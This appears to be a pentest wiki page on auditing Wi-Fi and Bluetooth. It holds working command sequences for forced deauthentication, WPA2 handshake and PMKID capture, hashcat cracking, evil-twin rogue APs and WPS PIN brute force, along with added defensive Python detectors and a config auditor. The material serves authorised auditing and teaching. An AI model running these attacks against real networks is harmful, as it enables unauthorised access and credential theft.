Wireless Attacks

Auditing 802.11 networks and Bluetooth targets

Updated 2026-04-16
Tags: #wifi #wpa2 #wpa3 #evil-twin #bluetooth #aircrack-ng #handshake
TL;DR
  • Your wireless adapter must support monitor mode and packet injection — most built-in adapters do not
  • The WPA2 four-way handshake is captured passively or triggered by deauthenticating a connected client
  • PMKID attack captures a crackable hash from the AP without needing any connected clients present
  • WPA2 cracking is offline — use hashcat with mode 22000 and a GPU; aircrack-ng on CPU is far slower
  • WPS is fundamentally broken — around 11,000 PIN attempts (Reaver/Bully) recovers the passphrase on vulnerable routers

Overview

Wireless attacks target the radio-frequency layer — Wi-Fi (802.11) and Bluetooth being the most common. Unlike wired attacks, the attack surface is physical: range, antenna gain, and RF environment matter as much as software. A wireless audit begins with putting your adapter into monitor mode and ends with either cracked credentials or a map of network exposures.


Prerequisites

  • A wireless adapter that supports monitor mode and packet injection (see Hardware Requirements below — not all adapters work)
  • Basic understanding of 802.11 networking: SSIDs, BSSIDs, channels, WPA2 authentication flow
  • Kali Linux with the aircrack-ng suite pre-installed (sudo apt install aircrack-ng)

Recommended lab: Build a practice environment using a spare router with WPA2. Capture and crack handshakes against your own network. Never test against networks you do not own or have written authorisation to test — this is illegal in most jurisdictions.


Hardware Requirements

Not all adapters support the packet injection and monitor mode needed for offensive wireless work. Recommended chipsets on Kali:

Adapter                       Vendor    Capabilities
Alfa AWUS036ACH               ALFA      Monitor, inject, 802.11ac
Alfa AWUS036NH                ALFA      Monitor, inject, 802.11n
TP-Link TL-WN722N (v1 only)   TP-Link   Monitor, inject, 802.11n
bash
# Check if your adapter supports monitor mode
iw list | grep "Supported interface modes" -A 10

# Check for injection support (the interface must already be in monitor mode, see below)
aireplay-ng --test wlan0mon

Monitor Mode

bash
# Put adapter into monitor mode
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# Or use airmon-ng (kills interfering processes automatically)
airmon-ng check kill
airmon-ng start wlan0

# Verify (airmon-ng renames the interface to wlan0mon; the iw method above keeps the name wlan0)
iwconfig wlan0mon

WPA2 Handshake Capture

The four-way handshake is captured when a client authenticates. You either wait for a natural connection or force a deauthentication.

bash
# Scan for networks
airodump-ng wlan0mon

# Target a specific AP — capture handshakes to file
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth a client to force reauthentication (in separate terminal)
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# Verify handshake captured
aircrack-ng capture-01.cap
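The deauthentication step above has an unmistakable on-air signature: a burst of deauth frames from one BSSID to one station, where a real disconnect is one or two frames. As an added example (not part of the original page), a small Python detector over constructed tshark-style records; the BSSID and client MAC are the page's placeholders, and the threshold and window are assumptions to tune per site.

```python
from collections import defaultdict, deque

AP = "AA:BB:CC:DD:EE:FF"       # placeholder BSSID used on this page
VICTIM = "11:22:33:44:55:66"   # placeholder client MAC used on this page
THRESHOLD = 8                  # deauth/disassoc frames to one station ...
WINDOW = 2.0                   # ... within this many seconds (assumed tuning)

def parse_line(line):
    """Parse one 'ts,subtype,bssid,dst,reason' record (tshark-style CSV)."""
    ts, subtype, bssid, dst, reason = line.strip().split(",")
    return (float(ts), subtype, bssid.upper(), dst.upper(),
            int(reason) if reason else None)

def detect_deauth_bursts(frames, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window count of deauth/disassoc frames per (BSSID, station).
    Returns {(bssid, station): {"count", "first", "last"}} for every pair
    that reaches `threshold` frames inside any `window`-second interval."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, subtype, bssid, dst, _reason in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[(bssid, dst)]
        q.append(ts)
        while ts - q[0] > window:          # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts[(bssid, dst)] = {"count": len(q), "first": q[0], "last": ts}
    return alerts

# Constructed sample: a beacon, one normal deauth (station leaving), then a
# 10-frame burst to a single client, the shape the aireplay-ng -0 step produces.
SAMPLE = [
    f"0.00,beacon,{AP},FF:FF:FF:FF:FF:FF,",
    f"0.40,deauth,{AP},22:33:44:55:66:77,3",
] + [f"{1.10 + 0.02 * i:.2f},deauth,{AP},{VICTIM},7" for i in range(10)]

if __name__ == "__main__":
    for (bssid, sta), a in detect_deauth_bursts(map(parse_line, SAMPLE)).items():
        print(f"ALERT {bssid} -> {sta}: {a['count']} deauths in "
              f"{a['last'] - a['first']:.2f}s")
```

Clients and APs with Protected Management Frames (802.11w, mandatory in WPA3) discard unauthenticated deauth frames, so a burst that does not produce reassociations is the expected picture on a hardened network.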

Cracking the Handshake

bash
# Dictionary attack with aircrack-ng
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

# Convert to hashcat format for GPU acceleration
hcxpcapngtool -o hash.hc22000 capture-01.cap

# Crack with hashcat (WPA2 = mode 22000)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

PMKID Attack (Clientless)

The PMKID attack doesn't require capturing a client's handshake: it needs only the RSN PMKID that the AP itself sends in the first message of the four-way handshake after an association request, so no client has to be connected.

bash
# Capture PMKID with hcxdumptool
# (option names changed in hcxdumptool 6.3 and later; check hcxdumptool --help for your version)
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# Extract hash
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Crack
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

Evil Twin / Rogue AP

A rogue AP impersonates a legitimate network to intercept credentials or force clients onto an attacker-controlled network.

bash
# hostapd-wpe — WPA Enterprise attack / credential capture
apt install hostapd-wpe
# Configure /etc/hostapd-wpe/hostapd-wpe.conf with target SSID
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# airbase-ng — create a rogue open AP
airbase-ng -e "FreeWifi" -c 6 wlan0mon

# Full evil twin with captive portal — use airgeddon
airgeddon
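From the defender's side, both rogue-AP forms above (an enterprise-SSID twin from hostapd-wpe, an open AP from airbase-ng) show up in a channel survey as a managed SSID coming from an unlisted BSSID or with the wrong security type. Added example, not from the original page: a Python check of a constructed survey against a constructed per-site allow-list; the SSIDs, BSSIDs and the four-field survey format are assumptions.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    bssid: str
    channel: int
    security: str   # e.g. "OPN", "WPA2-PSK", "WPA2-EAP", "WPA3-SAE"
    ssid: str

# Constructed site allow-list: SSID -> (authorised BSSIDs, expected security).
AUTHORISED = {
    "CorpWiFi": ({"AA:BB:CC:DD:EE:01", "AA:BB:CC:DD:EE:02"}, "WPA2-EAP"),
    "CorpGuest": ({"AA:BB:CC:DD:EE:03"}, "WPA2-PSK"),
}

# Constructed survey, one AP per line: "bssid,channel,security,ssid".
# Lines 4-6 model an enterprise twin, an open twin and a look-alike SSID;
# the unrelated "FreeWifi" line is out of scope for this check.
SURVEY = """\
AA:BB:CC:DD:EE:01,6,WPA2-EAP,CorpWiFi
AA:BB:CC:DD:EE:02,36,WPA2-EAP,CorpWiFi
AA:BB:CC:DD:EE:03,6,WPA2-PSK,CorpGuest
DE:AD:BE:EF:00:01,6,WPA2-EAP,CorpWiFi
DE:AD:BE:EF:00:02,6,OPN,CorpWiFi
DE:AD:BE:EF:00:03,11,WPA2-EAP,CorpWifi
CA:FE:00:00:00:01,1,OPN,FreeWifi
"""

def parse_survey(text):
    rows = []
    for line in text.strip().splitlines():
        bssid, ch, sec, ssid = line.split(",", 3)
        rows.append(Beacon(bssid.upper(), int(ch), sec, ssid))
    return rows

def find_rogues(beacons, authorised=AUTHORISED):
    """Flag APs that claim a managed SSID (exactly or as a case/space
    look-alike) but are not on the allow-list or offer the wrong security."""
    by_norm = {s.strip().casefold(): s for s in authorised}
    findings = []
    for b in beacons:
        canonical = by_norm.get(b.ssid.strip().casefold())
        if canonical is None:
            continue                      # unrelated network, not ours to judge
        bssids, expected = authorised[canonical]
        if b.ssid != canonical:
            findings.append((b.bssid, f"look-alike SSID {b.ssid!r}"))
        if b.bssid not in bssids:
            findings.append((b.bssid, f"unknown BSSID advertising {canonical}"))
        if b.security != expected:
            findings.append((b.bssid, f"security {b.security}, expected {expected}"))
    return findings
```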

WPS Attacks

WPS (Wi-Fi Protected Setup) has a fundamental flaw allowing the PIN to be brute-forced in ~11,000 attempts.

bash
# Check for WPS
wash -i wlan0mon

# Pixie Dust attack (fast, against vulnerable routers)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv

# Brute force WPS PIN
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vvv

Bluetooth Attacks

bash
# Scan for Bluetooth devices
hcitool scan
bluetoothctl
  > scan on
  > devices

# BlueZ tools — L2CAP ping (test connectivity)
l2ping -c 5 AA:BB:CC:DD:EE:FF

# Enumerate services on a device
sdptool browse AA:BB:CC:DD:EE:FF

# BLE scanning (IoT devices)
hcitool lescan
gatttool -b AA:BB:CC:DD:EE:FF --interactive
  > connect
  > primary           # list services
  > char-read-hnd 1   # read characteristic

Operational Notes

  • Channel hopping vs fixed — airodump-ng hops by default; fix the channel (-c 6) once you've identified your target.
  • 2.4 GHz vs 5 GHz — most adapters do 2.4 GHz. For 5 GHz capture you need a dual-band adapter.
  • WPA3 SAE — resistant to offline dictionary attacks; dragonblood attacks exist but require specific conditions.
  • Legal boundary — packet injection on networks you don't own or have written permission to test is illegal in most jurisdictions.
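The WPS section and the WPA3 SAE note above come down to a handful of access-point settings. Added example, not from the original page: a Python audit of two constructed hostapd.conf fragments that flags the options this page's attacks depend on (WPS on, no SAE, no PMF, TKIP, short PSK); the SSID, passphrases and the 16-character threshold are assumptions.

```python
# Constructed hostapd.conf fragments (not from the page): a common weak setup
# beside a hardened one that closes the gaps this page's attacks rely on.
WEAK_CONF = """\
ssid=HomeNet
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=password123
rsn_pairwise=TKIP CCMP
wps_state=2
ieee80211w=0
"""
HARDENED_CONF = """\
ssid=HomeNet
wpa=2
wpa_key_mgmt=SAE
sae_password=Correct-Horse-Battery-Staple-2026
rsn_pairwise=CCMP
wps_state=0
ieee80211w=2
"""

def parse_hostapd(text):
    """Minimal key=value parser; blank lines and # comments are ignored."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def audit(conf):
    """Return (key, finding) pairs for settings this page's attacks depend on."""
    findings = []
    kmgmt = conf.get("wpa_key_mgmt", "").split()
    if conf.get("wps_state", "0") != "0":
        findings.append(("wps_state", "WPS enabled: PIN brute force / Pixie Dust; set wps_state=0"))
    if "SAE" not in kmgmt:
        findings.append(("wpa_key_mgmt", "no WPA3-SAE: a captured handshake/PMKID is offline-crackable"))
    if conf.get("ieee80211w", "0") != "2":
        findings.append(("ieee80211w", "PMF not required: spoofed deauth is accepted; set ieee80211w=2"))
    if "TKIP" in conf.get("rsn_pairwise", "").split():
        findings.append(("rsn_pairwise", "TKIP allowed: legacy cipher; use CCMP only"))
    if "WPA-PSK" in kmgmt and len(conf.get("wpa_passphrase", "")) < 16:
        findings.append(("wpa_passphrase", "short PSK: cheap wordlist target for hashcat -m 22000"))
    return findings

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(parse_hostapd(text)) or "no findings")
```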

Related

  • Password Attacks — cracking the captured WPA2 handshake uses the same hashcat workflow covered there
  • Post-Exploitation — once on the wireless network, pivot to wired assets and internal services
  • Reconnaissance — passive wireless recon (wardriving, beacon analysis) feeds into broader target mapping